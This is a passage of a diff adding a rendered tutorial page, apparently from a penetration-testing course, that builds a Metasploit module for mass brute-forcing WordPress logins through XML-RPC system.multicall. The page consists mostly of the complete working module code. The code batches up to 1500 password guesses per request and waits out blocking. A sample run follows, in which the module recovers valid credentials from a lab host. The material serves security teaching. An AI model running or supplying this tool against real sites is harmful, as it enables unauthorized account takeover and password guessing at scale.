+ [<span class="hljs-string">&apos;URL&apos;</span>, <span class="hljs-string">&apos;https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/&apos;</span>],
1413
+ [<span class="hljs-string">&apos;URL&apos;</span>, <span class="hljs-string">&apos;https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html&apos;</span>]
1414
+ ]
1415
+ ))
1416
+
1417
+ register_options(
1418
+ [
1419
+ <span class="hljs-constant">OptString</span>.new(<span class="hljs-string">&apos;TARGETURI&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;The base path&apos;</span>, <span class="hljs-string">&apos;/&apos;</span>]),
1420
+ <span class="hljs-constant">OptPath</span>.new(<span class="hljs-string">&apos;WPUSER_FILE&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;File containing usernames, one per line&apos;</span>,
1421
+ <span class="hljs-constant">File</span>.join(<span class="hljs-constant">Msf::Config</span>.data_directory, <span class="hljs-string">&quot;wordlists&quot;</span>, <span class="hljs-string">&quot;http_default_users.txt&quot;</span>) ]),
1422
+ <span class="hljs-constant">OptPath</span>.new(<span class="hljs-string">&apos;WPPASS_FILE&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;File containing passwords, one per line&apos;</span>,
1423
+ <span class="hljs-constant">File</span>.join(<span class="hljs-constant">Msf::Config</span>.data_directory, <span class="hljs-string">&quot;wordlists&quot;</span>, <span class="hljs-string">&quot;http_default_pass.txt&quot;</span>)]),
1424
+ <span class="hljs-constant">OptInt</span>.new(<span class="hljs-string">&apos;BLOCKEDWAIT&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Time(minutes) to wait if got blocked&apos;</span>, <span class="hljs-number">6</span>]),
1425
+ <span class="hljs-constant">OptInt</span>.new(<span class="hljs-string">&apos;CHUNKSIZE&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Number of passwords need to be sent per request. (1700 is the max)&apos;</span>, <span class="hljs-number">1500</span>])
1426
+ ], <span class="hljs-keyword">self</span>.<span class="hljs-keyword">class</span>)
1427
+ <span class="hljs-keyword">end</span>
1428
+ <span class="hljs-keyword">end</span>
1429
+ </code></pre>
1430
+ <ul>
1431
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Read username and password lists as arrays </li>
1432
+ </ul>
1433
+ <pre><code class="lang-ruby"> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">usernames</span></span>
1434
+ <span class="hljs-constant">File</span>.readlines(datastore[<span class="hljs-string">&apos;WPUSER_FILE&apos;</span>]).map {|user| user.chomp}
1435
+ <span class="hljs-keyword">end</span>
1436
+
1437
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">passwords</span></span>
1438
+ <span class="hljs-constant">File</span>.readlines(datastore[<span class="hljs-string">&apos;WPPASS_FILE&apos;</span>]).map {|pass| pass.chomp}
1439
+ <span class="hljs-keyword">end</span>
1440
+ </code></pre>
1441
+ <ul>
1442
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Build/Generate XML file takes a user and iterate around the passwords</li>
1443
+ </ul>
1444
+ <pre><code class="lang-ruby"> <span class="hljs-comment">#</span>
1445
+ <span class="hljs-comment"># XML Factory</span>
1446
+ <span class="hljs-comment">#</span>
1447
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">generate_xml</span><span class="hljs-params">(user)</span></span>
1448
+
1449
+ vprint_warning(<span class="hljs-string">&apos;Generating XMLs may take a while depends on the list file(s) size.&apos;</span>) <span class="hljs-keyword">if</span> passwords.size &gt; <span class="hljs-number">1500</span>
1450
+ xml_payloads = [] <span class="hljs-comment"># Container for all generated XMLs</span>
1451
+ <span class="hljs-comment"># Evil XML | Limit number of log-ins to CHUNKSIZE/request due WordPress limitation which is 1700 maximum.</span>
1452
+ passwords.each_slice(datastore[<span class="hljs-string">&apos;CHUNKSIZE&apos;</span>]) <span class="hljs-keyword">do</span> |pass_group|
1453
+
1454
+ document = <span class="hljs-constant">Nokogiri::XML::Builder</span>.new <span class="hljs-keyword">do</span> |xml|
1455
+ xml.methodCall {
1456
+ xml.methodName(<span class="hljs-string">&quot;system.multicall&quot;</span>)
1457
+ xml.params {
1458
+ xml.param {
1459
+ xml.value {
1460
+ xml.array {
1461
+ xml.data {
1462
+
1463
+ pass_group.each <span class="hljs-keyword">do</span> |pass|
1464
+ xml.value {
1465
+ xml.struct {
1466
+ xml.member {
1467
+ xml.name(<span class="hljs-string">&quot;methodName&quot;</span>)
1468
+ xml.value { xml.string(<span class="hljs-string">&quot;wp.getUsersBlogs&quot;</span>) }}
1469
+ xml.member {
1470
+ xml.name(<span class="hljs-string">&quot;params&quot;</span>)
1471
+ xml.value {
1472
+ xml.array {
1473
+ xml.data {
1474
+ xml.value {
1475
+ xml.array {
1476
+ xml.data {
1477
+ xml.value { xml.string(user) }
1478
+ xml.value { xml.string(pass) }
1479
+ }}}}}}}}}
1480
+ <span class="hljs-keyword">end</span>
1481
+
1482
+ }}}}}}
1483
+ <span class="hljs-keyword">end</span>
1484
+
1485
+ xml_payloads &lt;&lt; document.to_xml
1486
+ <span class="hljs-keyword">end</span>
1487
+
1488
+ vprint_status(<span class="hljs-string">&apos;Generating XMLs just done.&apos;</span>)
1489
+ xml_payloads
1490
+ <span class="hljs-keyword">end</span>
1491
+ </code></pre>
1492
+ <ul>
1493
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check if target is running WordPress </li>
1494
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check if target enabling RPC</li>
1495
+ </ul>
1496
+ <pre><code class="lang-ruby"> <span class="hljs-comment">#</span>
1497
+ <span class="hljs-comment"># Check target status</span>
1498
+ <span class="hljs-comment">#</span>
1499
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">check_wpstatus</span></span>
1500
+ print_status(<span class="hljs-string">&quot;Checking <span class="hljs-subst">#{peer}</span> status!&quot;</span>)
1501
+
1502
+ <span class="hljs-keyword">if</span> !wordpress_and_online?
1503
+ print_error(<span class="hljs-string">&quot;<span class="hljs-subst">#{peer}</span>:<span class="hljs-subst">#{rport}</span><span class="hljs-subst">#{target_uri}</span> does not appear to be running WordPress or you got blocked! (Do Manual Check)&quot;</span>)
1504
+ <span class="hljs-keyword">nil</span>
1505
+ <span class="hljs-keyword">elsif</span> !wordpress_xmlrpc_enabled?
1506
+ print_error(<span class="hljs-string">&quot;<span class="hljs-subst">#{peer}</span>:<span class="hljs-subst">#{rport}</span><span class="hljs-subst">#{wordpress_url_xmlrpc}</span> does not enable XML-RPC&quot;</span>)
1507
+ <span class="hljs-keyword">nil</span>
1508
+ <span class="hljs-keyword">else</span>
1509
+ print_status(<span class="hljs-string">&quot;Target <span class="hljs-subst">#{peer}</span> is running WordPress&quot;</span>)
1510
+ <span class="hljs-keyword">true</span>
1511
+ <span class="hljs-keyword">end</span>
1512
+
1513
+ <span class="hljs-keyword">end</span>
1514
+ </code></pre>
1515
+ <ul>
1516
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Setup the HTTP with XML POST request</li>
1517
+ </ul>
1518
+ <pre><code class="lang-ruby"> <span class="hljs-comment">#</span>
1519
+ <span class="hljs-comment"># Connection Setup</span>
1520
+ <span class="hljs-comment">#</span>
1521
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send</span><span class="hljs-params">(xml)</span></span>
1522
+ uri = target_uri.path
1523
+ opts =
1524
+ {
1525
+ <span class="hljs-string">&apos;method&apos;</span> =&gt; <span class="hljs-string">&apos;POST&apos;</span>,
1526
+ <span class="hljs-string">&apos;uri&apos;</span> =&gt; normalize_uri(uri, wordpress_url_xmlrpc),
1527
+ <span class="hljs-string">&apos;data&apos;</span> =&gt; xml,
1528
+ <span class="hljs-string">&apos;ctype&apos;</span> =&gt;<span class="hljs-string">&apos;text/xml&apos;</span>
1529
+ }
1530
+ client = <span class="hljs-constant">Rex::Proto::Http::Client</span>.new(rhost)
1531
+ client.connect
1532
+ req = client.request_cgi(opts)
1533
+ res = client.send_recv(req)
1534
+
1535
+ <span class="hljs-keyword">if</span> res &amp;&amp; res.code != <span class="hljs-number">200</span>
1536
+ print_error(<span class="hljs-string">&apos;It seems you got blocked!&apos;</span>)
1537
+ print_warning(<span class="hljs-string">&quot;I&apos;ll sleep for <span class="hljs-subst">#{datastore[<span class="hljs-string">&apos;BLOCKEDWAIT&apos;</span>]}</span> minutes, then I&apos;ll try again. CTR+C to exit&quot;</span>)
1538
+ sleep datastore[<span class="hljs-string">&apos;BLOCKEDWAIT&apos;</span>] * <span class="hljs-number">60</span>
1539
+ <span class="hljs-keyword">end</span>
1540
+ <span class="hljs-variable">@res</span> = res
1541
+ <span class="hljs-keyword">end</span>
1542
+ </code></pre>
1543
+ <ul>
1544
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Parse XML request and response </li>
1545
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Find the exact correct credentials </li>
1546
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check if we got blocked</li>
1547
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Parsing the result and find which password is correct </li>
1548
+ </ul>
1549
+ <pre><code class="lang-ruby"> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span></span>
1550
+ <span class="hljs-keyword">return</span> <span class="hljs-keyword">if</span> check_wpstatus.<span class="hljs-keyword">nil</span>?
1551
+
1552
+ usernames.each <span class="hljs-keyword">do</span> |user|
1553
+ passfound = <span class="hljs-keyword">false</span>
1554
+
1555
+ print_status(<span class="hljs-string">&quot;Brute forcing user: <span class="hljs-subst">#{user}</span>&quot;</span>)
1556
+ generate_xml(user).each <span class="hljs-keyword">do</span> |xml|
1557
+ <span class="hljs-keyword">next</span> <span class="hljs-keyword">if</span> passfound == <span class="hljs-keyword">true</span>
1558
+
1559
+ send(xml)
1560
+
1561
+ <span class="hljs-comment"># Request Parser</span>
1562
+ req_xml = <span class="hljs-constant">Nokogiri::Slop</span> xml
1563
+ <span class="hljs-comment"># Response Parser</span>
1564
+ res_xml = <span class="hljs-constant">Nokogiri::Slop</span> <span class="hljs-variable">@res</span>.to_s.scan(<span class="hljs-regexp">/&lt;.*&gt;/</span>).join
1565
+ puts res_xml
1566
+ res_xml.search(<span class="hljs-string">&quot;methodResponse/params/param/value/array/data/value&quot;</span>).each_with_index <span class="hljs-keyword">do</span> |value, i|
1567
+
1568
+ result = value.at(<span class="hljs-string">&quot;struct/member/value/int&quot;</span>)
1569
+ <span class="hljs-comment"># If response error code doesn&apos;t not exist, then it&apos;s the correct credentials!</span>
1570
+ <span class="hljs-keyword">if</span> result.<span class="hljs-keyword">nil</span>?
1571
+ user = req_xml.search(<span class="hljs-string">&quot;data/value/array/data&quot;</span>)[i].value[<span class="hljs-number">0</span>].text.strip
1572
+ pass = req_xml.search(<span class="hljs-string">&quot;data/value/array/data&quot;</span>)[i].value[<span class="hljs-number">1</span>].text.strip
1573
+ print_good(<span class="hljs-string">&quot;Credentials Found! <span class="hljs-subst">#{user}</span>:<span class="hljs-subst">#{pass}</span>&quot;</span>)
1574
+
1575
+ passfound = <span class="hljs-keyword">true</span>
1576
+ <span class="hljs-keyword">end</span>
1577
+
1578
+ <span class="hljs-keyword">end</span>
1579
+
1580
+ <span class="hljs-keyword">unless</span> user == usernames.last
1581
+ vprint_status(<span class="hljs-string">&apos;Sleeping for 2 seconds..&apos;</span>)
1582
+ sleep <span class="hljs-number">2</span>
1583
+ <span class="hljs-keyword">end</span>
1584
+
1585
+ <span class="hljs-keyword">end</span>
1586
+ <span class="hljs-keyword">end</span>
1587
+ <span class="hljs-keyword">end</span>
1588
+ </code></pre>
1589
+ <h4 id="wrapping-up"><a name="wrapping-up" class="plugin-anchor" href="#wrapping-up"><span class="fa fa-link"></span></a>Wrapping up</h4>
1590
+ <pre><code class="lang-ruby"><span class="hljs-comment">##</span>
1591
+ <span class="hljs-comment"># This module requires Metasploit: http://www.metasploit.com/download</span>
1592
+ <span class="hljs-comment"># Current source: https://github.com/rapid7/metasploit-framework</span>
1593
+ <span class="hljs-comment">##</span>
1594
+
1595
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;msf/core&apos;</span>
1596
+
1597
+ <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Metasploit3</span> <span class="hljs-inheritance">&lt; <span class="hljs-parent">Msf::Auxiliary</span></span></span>
1598
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::HttpClient</span>
1599
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::HTTP::Wordpress</span>
1600
+
1601
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">initialize</span><span class="hljs-params">(info = {})</span></span>
1602
+ <span class="hljs-keyword">super</span>(update_info(
1603
+ info,
1604
+ <span class="hljs-string">&apos;Name&apos;</span> =&gt; <span class="hljs-string">&apos;WordPress XML-RPC Massive Brute Force&apos;</span>,
1605
+ <span class="hljs-string">&apos;Description&apos;</span> =&gt; <span class="hljs-string">%q{WordPress massive brute force attacks via WordPress XML-RPC service.}</span>,
1606
+ <span class="hljs-string">&apos;License&apos;</span> =&gt; <span class="hljs-constant">MSF_LICENSE</span>,
1607
+ <span class="hljs-string">&apos;Author&apos;</span> =&gt;
1608
+ [
1609
+ <span class="hljs-string">&apos;Sabri (@KINGSABRI)&apos;</span>, <span class="hljs-comment"># Module Writer</span>
1610
+ <span class="hljs-string">&apos;William (WCoppola@Lares.com)&apos;</span> <span class="hljs-comment"># Module Requester</span>
1611
+ ],
1612
+ <span class="hljs-string">&apos;References&apos;</span> =&gt;
1613
+ [
1614
+ [<span class="hljs-string">&apos;URL&apos;</span>, <span class="hljs-string">&apos;https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/&apos;</span>],
1615
+ [<span class="hljs-string">&apos;URL&apos;</span>, <span class="hljs-string">&apos;https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html&apos;</span>]
1616
+ ]
1617
+ ))
1618
+
1619
+ register_options(
1620
+ [
1621
+ <span class="hljs-constant">OptString</span>.new(<span class="hljs-string">&apos;TARGETURI&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;The base path&apos;</span>, <span class="hljs-string">&apos;/&apos;</span>]),
1622
+ <span class="hljs-constant">OptPath</span>.new(<span class="hljs-string">&apos;WPUSER_FILE&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;File containing usernames, one per line&apos;</span>,
1623
+ <span class="hljs-constant">File</span>.join(<span class="hljs-constant">Msf::Config</span>.data_directory, <span class="hljs-string">&quot;wordlists&quot;</span>, <span class="hljs-string">&quot;http_default_users.txt&quot;</span>) ]),
1624
+ <span class="hljs-constant">OptPath</span>.new(<span class="hljs-string">&apos;WPPASS_FILE&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;File containing passwords, one per line&apos;</span>,
1625
+ <span class="hljs-constant">File</span>.join(<span class="hljs-constant">Msf::Config</span>.data_directory, <span class="hljs-string">&quot;wordlists&quot;</span>, <span class="hljs-string">&quot;http_default_pass.txt&quot;</span>)]),
1626
+ <span class="hljs-constant">OptInt</span>.new(<span class="hljs-string">&apos;BLOCKEDWAIT&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Time(minutes) to wait if got blocked&apos;</span>, <span class="hljs-number">6</span>]),
1627
+ <span class="hljs-constant">OptInt</span>.new(<span class="hljs-string">&apos;CHUNKSIZE&apos;</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Number of passwords need to be sent per request. (1700 is the max)&apos;</span>, <span class="hljs-number">1500</span>])
1628
+ ], <span class="hljs-keyword">self</span>.<span class="hljs-keyword">class</span>)
1629
+ <span class="hljs-keyword">end</span>
1630
+
1631
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">usernames</span></span>
1632
+ <span class="hljs-constant">File</span>.readlines(datastore[<span class="hljs-string">&apos;WPUSER_FILE&apos;</span>]).map {|user| user.chomp}
1633
+ <span class="hljs-keyword">end</span>
1634
+
1635
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">passwords</span></span>
1636
+ <span class="hljs-constant">File</span>.readlines(datastore[<span class="hljs-string">&apos;WPPASS_FILE&apos;</span>]).map {|pass| pass.chomp}
1637
+ <span class="hljs-keyword">end</span>
1638
+
1639
+ <span class="hljs-comment">#</span>
1640
+ <span class="hljs-comment"># XML Factory</span>
1641
+ <span class="hljs-comment">#</span>
1642
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">generate_xml</span><span class="hljs-params">(user)</span></span>
1643
+
1644
+ vprint_warning(<span class="hljs-string">&apos;Generating XMLs may take a while depends on the list file(s) size.&apos;</span>) <span class="hljs-keyword">if</span> passwords.size &gt; <span class="hljs-number">1500</span>
1645
+ xml_payloads = [] <span class="hljs-comment"># Container for all generated XMLs</span>
1646
+ <span class="hljs-comment"># Evil XML | Limit number of log-ins to CHUNKSIZE/request due WordPress limitation which is 1700 maximum.</span>
1647
+ passwords.each_slice(datastore[<span class="hljs-string">&apos;CHUNKSIZE&apos;</span>]) <span class="hljs-keyword">do</span> |pass_group|
1648
+
1649
+ document = <span class="hljs-constant">Nokogiri::XML::Builder</span>.new <span class="hljs-keyword">do</span> |xml|
1650
+ xml.methodCall {
1651
+ xml.methodName(<span class="hljs-string">&quot;system.multicall&quot;</span>)
1652
+ xml.params {
1653
+ xml.param {
1654
+ xml.value {
1655
+ xml.array {
1656
+ xml.data {
1657
+
1658
+ pass_group.each <span class="hljs-keyword">do</span> |pass|
1659
+ xml.value {
1660
+ xml.struct {
1661
+ xml.member {
1662
+ xml.name(<span class="hljs-string">&quot;methodName&quot;</span>)
1663
+ xml.value { xml.string(<span class="hljs-string">&quot;wp.getUsersBlogs&quot;</span>) }}
1664
+ xml.member {
1665
+ xml.name(<span class="hljs-string">&quot;params&quot;</span>)
1666
+ xml.value {
1667
+ xml.array {
1668
+ xml.data {
1669
+ xml.value {
1670
+ xml.array {
1671
+ xml.data {
1672
+ xml.value { xml.string(user) }
1673
+ xml.value { xml.string(pass) }
1674
+ }}}}}}}}}
1675
+ <span class="hljs-keyword">end</span>
1676
+
1677
+ }}}}}}
1678
+ <span class="hljs-keyword">end</span>
1679
+
1680
+ xml_payloads &lt;&lt; document.to_xml
1681
+ <span class="hljs-keyword">end</span>
1682
+
1683
+ vprint_status(<span class="hljs-string">&apos;Generating XMLs just done.&apos;</span>)
1684
+ xml_payloads
1685
+ <span class="hljs-keyword">end</span>
1686
+
1687
+ <span class="hljs-comment">#</span>
1688
+ <span class="hljs-comment"># Check target status</span>
1689
+ <span class="hljs-comment">#</span>
1690
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">check_wpstatus</span></span>
1691
+ print_status(<span class="hljs-string">&quot;Checking <span class="hljs-subst">#{peer}</span> status!&quot;</span>)
1692
+
1693
+ <span class="hljs-keyword">if</span> !wordpress_and_online?
1694
+ print_error(<span class="hljs-string">&quot;<span class="hljs-subst">#{peer}</span>:<span class="hljs-subst">#{rport}</span><span class="hljs-subst">#{target_uri}</span> does not appear to be running WordPress or you got blocked! (Do Manual Check)&quot;</span>)
1695
+ <span class="hljs-keyword">nil</span>
1696
+ <span class="hljs-keyword">elsif</span> !wordpress_xmlrpc_enabled?
1697
+ print_error(<span class="hljs-string">&quot;<span class="hljs-subst">#{peer}</span>:<span class="hljs-subst">#{rport}</span><span class="hljs-subst">#{wordpress_url_xmlrpc}</span> does not enable XML-RPC&quot;</span>)
1698
+ <span class="hljs-keyword">nil</span>
1699
+ <span class="hljs-keyword">else</span>
1700
+ print_status(<span class="hljs-string">&quot;Target <span class="hljs-subst">#{peer}</span> is running WordPress&quot;</span>)
1701
+ <span class="hljs-keyword">true</span>
1702
+ <span class="hljs-keyword">end</span>
1703
+
1704
+ <span class="hljs-keyword">end</span>
1705
+
1706
+ <span class="hljs-comment">#</span>
1707
+ <span class="hljs-comment"># Connection Setup</span>
1708
+ <span class="hljs-comment">#</span>
1709
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send</span><span class="hljs-params">(xml)</span></span>
1710
+ uri = target_uri.path
1711
+ opts =
1712
+ {
1713
+ <span class="hljs-string">&apos;method&apos;</span> =&gt; <span class="hljs-string">&apos;POST&apos;</span>,
1714
+ <span class="hljs-string">&apos;uri&apos;</span> =&gt; normalize_uri(uri, wordpress_url_xmlrpc),
1715
+ <span class="hljs-string">&apos;data&apos;</span> =&gt; xml,
1716
+ <span class="hljs-string">&apos;ctype&apos;</span> =&gt;<span class="hljs-string">&apos;text/xml&apos;</span>
1717
+ }
1718
+ client = <span class="hljs-constant">Rex::Proto::Http::Client</span>.new(rhost)
1719
+ client.connect
1720
+ req = client.request_cgi(opts)
1721
+ res = client.send_recv(req)
1722
+
1723
+ <span class="hljs-keyword">if</span> res &amp;&amp; res.code != <span class="hljs-number">200</span>
1724
+ print_error(<span class="hljs-string">&apos;It seems you got blocked!&apos;</span>)
1725
+ print_warning(<span class="hljs-string">&quot;I&apos;ll sleep for <span class="hljs-subst">#{datastore[<span class="hljs-string">&apos;BLOCKEDWAIT&apos;</span>]}</span> minutes, then I&apos;ll try again. CTR+C to exit&quot;</span>)
1726
+ sleep datastore[<span class="hljs-string">&apos;BLOCKEDWAIT&apos;</span>] * <span class="hljs-number">60</span>
1727
+ <span class="hljs-keyword">end</span>
1728
+ <span class="hljs-variable">@res</span> = res
1729
+ <span class="hljs-keyword">end</span>
1730
+
1731
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span></span>
1732
+ <span class="hljs-keyword">return</span> <span class="hljs-keyword">if</span> check_wpstatus.<span class="hljs-keyword">nil</span>?
1733
+
1734
+ usernames.each <span class="hljs-keyword">do</span> |user|
1735
+ passfound = <span class="hljs-keyword">false</span>
1736
+
1737
+ print_status(<span class="hljs-string">&quot;Brute forcing user: <span class="hljs-subst">#{user}</span>&quot;</span>)
1738
+ generate_xml(user).each <span class="hljs-keyword">do</span> |xml|
1739
+ <span class="hljs-keyword">next</span> <span class="hljs-keyword">if</span> passfound == <span class="hljs-keyword">true</span>
1740
+
1741
+ send(xml)
1742
+
1743
+ <span class="hljs-comment"># Request Parser</span>
1744
+ req_xml = <span class="hljs-constant">Nokogiri::Slop</span> xml
1745
+ <span class="hljs-comment"># Response Parser</span>
1746
+ res_xml = <span class="hljs-constant">Nokogiri::Slop</span> <span class="hljs-variable">@res</span>.to_s.scan(<span class="hljs-regexp">/&lt;.*&gt;/</span>).join
1747
+ puts res_xml
1748
+ res_xml.search(<span class="hljs-string">&quot;methodResponse/params/param/value/array/data/value&quot;</span>).each_with_index <span class="hljs-keyword">do</span> |value, i|
1749
+
1750
+ result = value.at(<span class="hljs-string">&quot;struct/member/value/int&quot;</span>)
1751
+ <span class="hljs-comment"># If response error code doesn&apos;t not exist</span>
1752
+ <span class="hljs-keyword">if</span> result.<span class="hljs-keyword">nil</span>?
1753
+ user = req_xml.search(<span class="hljs-string">&quot;data/value/array/data&quot;</span>)[i].value[<span class="hljs-number">0</span>].text.strip
1754
+ pass = req_xml.search(<span class="hljs-string">&quot;data/value/array/data&quot;</span>)[i].value[<span class="hljs-number">1</span>].text.strip
1755
+ print_good(<span class="hljs-string">&quot;Credentials Found! <span class="hljs-subst">#{user}</span>:<span class="hljs-subst">#{pass}</span>&quot;</span>)
1756
+
1757
+ passfound = <span class="hljs-keyword">true</span>
1758
+ <span class="hljs-keyword">end</span>
1759
+
1760
+ <span class="hljs-keyword">end</span>
1761
+
1762
+ <span class="hljs-keyword">unless</span> user == usernames.last
1763
+ vprint_status(<span class="hljs-string">&apos;Sleeping for 2 seconds..&apos;</span>)
1764
+ sleep <span class="hljs-number">2</span>
1765
+ <span class="hljs-keyword">end</span>
1766
+
1767
+ <span class="hljs-keyword">end</span> <span class="hljs-keyword">end</span> <span class="hljs-keyword">end</span>
1768
+ <span class="hljs-keyword">end</span>
1769
+ </code></pre>
1770
+ <ul>
1771
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check if the module has been written correctly (msftidy.rb)</li>
1772
+ </ul>
1773
+ <pre><code>metasploit-framework/tools/dev/msftidy.rb wordpress_xmlrpc_massive_bruteforce.rb
1774
+ </code></pre><p><strong>Run it</strong></p>
1775
+ <pre><code>msf auxiliary(wordpress_xmlrpc_massive_bruteforce) &gt; show options
1776
+
1777
+ Module options (auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce):
1778
+
1779
+ Name Current Setting Required Description
1780
+ ---- --------------- -------- -----------
1781
+ BLOCKEDWAIT 6 yes Time(minutes) to wait if got blocked
1782
+ CHUNKSIZE 1500 yes Number of passwords need to be sent per request. (1700 is the max)
1783
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
1784
+ RHOST 172.17.0.3 yes The target address
1785
+ RPORT 80 yes The target port
1786
+ TARGETURI / yes The base path
1787
+ VHOST no HTTP server virtual host
1788
+ WPPASS_FILE /home/KING/Code/MSF/metasploit-framework/data/wordlists/http_default_pass.txt yes File containing passwords, one per line
1789
+ WPUSER_FILE /home/KING/Code/MSF/metasploit-framework/data/wordlists/http_default_users.txt yes File containing usernames, one per line
1790
+
1791
+ msf auxiliary(wordpress_xmlrpc_massive_bruteforce) &gt; run
1792
+
1793
+ [*] Checking 172.17.0.3:80 status!
1794
+ [*] Target 172.17.0.3:80 is running WordPress
1795
+ [*] Brute forcing user: admin
1796
+ [+] Credentials Found! admin:password
1797
+ [*] Brute forcing user: manager
1798
+ [*] Brute forcing user: root
1799
+ [*] Brute forcing user: cisco
1800
+ [*] Brute forcing user: apc
1801
+ [*] Brute forcing user: pass
1802
+ [*] Brute forcing user: security
1803
+ [*] Brute forcing user: user
1804
+ [*] Brute forcing user: system
1805
+ [+] Credentials Found! system:root
1806
+ [*] Brute forcing user: sys
1807
+ [*] Brute forcing user: wampp
1808
+ [*] Brute forcing user: newuser
1809
+ [*] Brute forcing user: xampp-dav-unsecure
1810
+ [*] Auxiliary module execution completed
1811
+ </code></pre>
1812
+
1813
+ </section>
1814
+
1815
+
1816
+ </div>
1817
+ </div>
1818
+ </div>
1819
+
1820
+
1821
+ <a href="../module_0x5__exploitation_kung_fu/metasploit.html" class="navigation navigation-prev " aria-label="Previous page: Metasploit"><i class="fa fa-angle-left"></i></a>
1822
+
1823
+
1824
+ <a href="../module_0x5__exploitation_kung_fu/exploit_module.html" class="navigation navigation-next " aria-label="Next page: Exploit module"><i class="fa fa-angle-right"></i></a>
1825
+
1826
+ </div>
1827
+ </div>
1828
+
1829
+
1830
+ <script src="../gitbook/app.js"></script>
1831
+
1832
+
1833
+ <script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
1834
+
1835
+
1836
+
1837
+ <script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
1838
+
1839
+
1840
+
1841
+ <script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
1842
+
1843
+
1844
+
1845
+ <script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
1846
+
1847
+
1848
+
1849
+ <script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
1850
+
1851
+
1852
+
1853
+ <script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
1854
+
1855
+
1856
+
1857
+ <script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
1858
+
1859
+
1860
+ <script>
1861
+ require(["gitbook"], function(gitbook) {
1862
+ var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
1863
+ gitbook.start(config);
1864
+ });
1865
+ </script>
1866
+
1867
+
1868
+ </body>
1869
+
1870
+ </html>